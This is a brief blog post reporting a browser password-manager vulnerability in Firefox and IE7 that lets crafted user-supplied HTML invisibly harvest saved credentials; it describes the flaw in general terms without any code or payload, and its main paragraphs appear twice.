Whoa! Even Firefox Isn't Safe!
A new vulnerability, complete with exploit in the wild, has been logged against Firefox (the same exploit works against IE7).
This is a really bad one: Whenever you visit a site containing user-supplied HTML (such as, well, this one, for example), a page can be crafted to slurp your credentials for that site -- invisibly -- and send them off to wherever the phisher desires.
For example, if you have an account on Blogger, I may have already stolen your credentials if you click anywhere on this page! (I didn't. Honest.)
Basically the exploit fools Firefox's (or IE's) password manager into saying "Hey, I know the site this page is from, and we have login for it, so what harm?"
Plenty, as it turns out.
Mad props to Slashdot for publicizing this one.
This is a really bad one: Whenever you visit a site containing user-supplied HTML (such as, well, this one, for example), a page can be crafted to slurp your credentials for that site -- invisibly -- and send them off to wherever the phisher desires.
For example, if you have an account on Blogger, I may have already stolen your credentials if you click anywhere on this page! (I didn't. Honest.)
Basically the exploit fools Firefox's (or IE's) password manager into saying "Hey, I know the site this page is from, and we have login for it, so what harm?"
Plenty, as it turns out.
Mad props to Slashdot for publicizing this one.
posted by lupus @ 1:36 PM
0 Comments:
Post a Comment
<< Home